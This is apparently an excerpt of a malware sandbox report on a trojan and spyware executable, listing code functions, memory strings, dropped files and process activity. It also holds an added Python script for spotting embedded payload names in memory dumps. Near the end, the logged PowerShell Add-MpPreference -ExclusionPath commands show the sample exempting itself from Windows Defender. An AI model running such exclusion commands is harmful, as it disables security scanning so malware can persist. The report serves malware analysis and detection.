                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016425E1
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016413F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01649B6C
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01641B6A
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01649CF0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01642030
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_0164A259
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_0164A290
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01640871
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01641366
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016455E8
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016455DA
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01643441
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016457E0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016457F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_016439CC
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01645A68
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01645A59
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_01649CE0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_057B2C00
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FAC400
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FAC3F0
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FAA200
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FA9DB9
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FABA50
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe Code function: 11_2_07FA9983
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01970100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019C6000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01A002C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01980535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0197C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019A4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01980770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019829A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01996962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019B8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019668B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019AE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0198A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01982840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0197EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01998DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01988DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0197ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0198AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0198ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01970CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01980C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019FEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01972FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019A0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019C2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019F4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01992E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01980E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0198B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0196F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019B516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019833F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0196D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019852A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01983497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019C74E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01971460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0198B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01985990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01989950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019838E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019ED800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019BDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019F5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019F3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0199FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01983D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_019F9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01999C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01981F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01989EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0042EDF3
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B8E4F6
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B92446
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04BA0591
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE0535
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AFC6E0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04ADC7C0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE0770
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B04750
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B72000
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04BA01AA
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B981CC
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AD0100
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B7A118
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B68158
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B602C0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B80274
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04BA03E6
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AEE3F0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9A352
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B80CB5
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AD0CF2
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE0C00
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AF8DBF
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04ADADE0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AEAD00
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9CE93
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AF2E90
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9EEDB
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9EE26
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE0E59
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B5EFA0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AECFE0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AD2FC8
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B00F30
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B22F28
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B54F40
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AC68B8
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B0E8F0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE2840
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AEA840
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE29A0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04BAA9A6
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AF6962
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04ADEA80
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B96BD7
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9AB40
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9F43F
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AD1460
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B7D5B0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B97571
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B916CC
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9F7B0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B970E9
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9F0E0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE70C0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B8F0CC
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AEB1B0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04BAB16B
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B1516C
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04ACF172
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE52A0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B812ED
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AFB2C0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B2739A
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9132D
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04ACD34C
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9FCF2
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B59C32
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AFFDC0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B97D73
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B91D5A
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE3D40
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE9EB0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9FFB1
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE1F92
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9FF09
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE38E0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B4D800
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AE9950
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AFB950
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B25AA0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B7DAAC
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B8DAC6
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B53A6C
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9FA49
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B97A46
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04AFFB80
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B55BF0
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B1DBF9
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_04B9FB76
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00AC1E60
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABB0A9
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABB060
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABB054
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00AB11A3
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00AC5520
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00AC370B
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00AC3710
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ADBC40
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABCD10
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABCF30
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_00ABAF10
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048EE4AC
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048EE6DD
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048ED7A8
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048EE228
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048EE343
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048EE86C
                Source: C:\Windows\SysWOW64\systray.exe Code function: 19_2_048ECA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 019C7E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0171F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 016D5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 019EEA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0170EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 016E7E54 appears 111 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0168B970 appears 280 times
                Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04B27E54 appears 99 times
                Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04B4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04ACB970 appears 273 times
                Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04B15130 appears 37 times
                Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04B5F290 appears 105 times
                Source: MN1qo2qaJmEvXDP.exe Static PE information: invalid certificate
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2420596880.0000000003E49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2414232907.00000000009BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2420596880.0000000003E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2436656014.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2436142319.0000000007500000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.00000000026FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000000.2310144765.000000000032C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCvjBo.exe: vs MN1qo2qaJmEvXDP.exe
                Source: MN1qo2qaJmEvXDP.exe Binary or memory string: OriginalFilenameCvjBo.exe: vs MN1qo2qaJmEvXDP.exe
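The "OriginalFilename ... vs MN1qo2qaJmEvXDP.exe" rows are the sandbox pulling VERSIONINFO strings out of the process memory dumps and comparing them with the submitted file name. A mismatch such as Arthur.dll, Montero.dll or CvjBo.exe inside a process that is running as MN1qo2qaJmEvXDP.exe indicates that the image carries or unpacks other PE payloads; the stray trailing characters in the report rows (the `"` after Arthur.dll, the `T` after clr.dll) are most likely the first byte of the next VERSIONINFO structure picked up by a plain string scan. The script below is an added example, not Joe Sandbox code, that performs the same check over a raw dump. It scans for the UTF-16LE `OriginalFilename` key, reads the value up to its NUL terminator, and reports the names that differ from the sample's own. The `_vs_string` helper and `SAMPLE_DUMP` are constructed test data that mimic the layout of a VS_VERSION_INFO String child.

```python
"""Compare VERSIONINFO OriginalFilename values found in a memory dump with the sample name.

Added example modelled on the sandbox's "Binary or memory string: OriginalFilename... vs ..."
rows; it is not Joe Sandbox code and the sample dump below is constructed test data.
"""
import re

# A VS_VERSION_INFO String child stores the key as UTF-16LE, then a NUL terminator,
# then zero or two bytes of DWORD padding, then the UTF-16LE value and its terminator.
# The value is read as printable ASCII in UTF-16LE (char, 0x00), up to MAX_PATH chars.
_ORIG_RE = re.compile(
    "OriginalFilename".encode("utf-16-le")
    + rb"(?:\x00\x00)+"                    # key terminator plus optional alignment padding
    + rb"((?:[\x20-\x7e]\x00){1,260})"     # value; stops at the 0x00 0x00 terminator
)


def original_filenames(blob: bytes) -> list[str]:
    """Return every OriginalFilename value in the buffer, in order of appearance."""
    return [m.group(1).decode("utf-16-le") for m in _ORIG_RE.finditer(blob)]


def mismatched_names(blob: bytes, sample_name: str) -> list[str]:
    """OriginalFilename values that differ from the sample's own file name.

    Comparison is case-insensitive (Windows file names are); duplicates are collapsed
    so the same embedded payload seen in several dumps is reported once.
    """
    seen: list[str] = []
    for name in original_filenames(blob):
        if name.lower() != sample_name.lower() and name not in seen:
            seen.append(name)
    return seen


def _vs_string(key: str, value: str) -> bytes:
    """Constructed test input: key, NUL terminator, DWORD padding, value, NUL terminator."""
    body = key.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00\x00" * ((4 - len(body) % 4) % 4)
    return body + value.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a process memory dump: two embedded payload names, one
# unrelated VERSIONINFO key, and the sample's own name. The lone '"' byte after the
# first entry imitates the stray character a naive string scan would attach to it.
SAMPLE_DUMP = (
    b"\x00" * 16
    + _vs_string("OriginalFilename", "Arthur.dll") + b'"'
    + b"MZ" + b"\x90" * 8
    + _vs_string("OriginalFilename", "CvjBo.exe")
    + _vs_string("FileDescription", "not a file name")
    + _vs_string("OriginalFilename", "MN1qo2qaJmEvXDP.exe")
)


if __name__ == "__main__":
    for name in mismatched_names(SAMPLE_DUMP, "MN1qo2qaJmEvXDP.exe"):
        print(f"OriginalFilename {name} vs MN1qo2qaJmEvXDP.exe")
```

To run it against a real dump, read the `.sdmp` (or any process memory region) into `blob` and pass the on-disk sample name; every name reported is a candidate embedded or unpacked PE worth carving out and hashing separately.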
                Source: MN1qo2qaJmEvXDP.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MN1qo2qaJmEvXDP.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rlJvZXSinaRi.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GEBJEhGjieg361Vr8V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/14@12/10
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMutant created: \Sessions\1\BaseNamedObjects\FfcRgKWzEumrezRaCzBFEJJyTyT
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1B5C.tmpJump to behavior
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: MN1qo2qaJmEvXDP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: systray.exe, 00000013.00000003.2803665945.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2803784366.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MN1qo2qaJmEvXDP.exeReversingLabs: Detection: 63%
                Source: MN1qo2qaJmEvXDP.exeVirustotal: Detection: 47%
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile read: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
